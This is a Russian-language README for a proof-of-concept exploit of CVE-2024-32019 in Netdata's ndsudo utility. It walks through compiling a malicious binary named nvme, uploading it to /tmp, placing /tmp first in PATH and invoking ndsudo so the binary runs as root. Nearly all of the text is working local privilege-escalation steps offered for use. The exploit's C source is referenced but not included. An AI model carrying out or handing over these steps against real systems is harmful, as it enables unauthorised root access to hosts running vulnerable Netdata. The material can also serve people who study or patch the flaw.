
PoC для уязвимости netdata ndsudo - CVE-2024-32019
ndsudo (локальная эксплуатация Netdata)Этот POC используется для эксплуатации уязвимой утилиты ndsudo, входящей в состав Netdata, с целью повышения локальных привилегий до root. Эксплойт работает путём внедрения вредоносного бинарника в PATH пользователя, который выдает себя за доверенную команду (nvme) и выполняется с привилегиями root через ndsudo.
У вас есть локальный доступ к оболочке на целевой системе.
Вы можете выполнить следующую команду, но она завершается ошибкой "не найдено" или подобной:
./ndsudo nvme-list
На вашей атакующей машине (или на уязвимой системе, если у нее есть компилятор) скомпилируйте бинарник (например, из файла poc.c из репозитория):
gcc poc.c -o nvme
Этот бинарник должен быть создан так, чтобы запустить корневую оболочку или выполнить произвольные команды с привилегиями root.
Переместите или загрузите скомпилированный бинарник nvme в каталог, доступный для записи вашим пользователем, например /tmp:
scp nvme user@target:/tmp/
# или используйте любой доступный метод загрузки файлов
На целевой системе убедитесь, что бинарник является исполняемым, и добавьте его каталог в начало вашего PATH:
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
Это гарантирует, что ndsudo будет находить и выполнять ваш вредоносный nvme вместо легитимного.
ndsudo для выполнения вашей нагрузкиВыполните уязвимую команду для запуска ndsudo:
./ndsudo nvme-list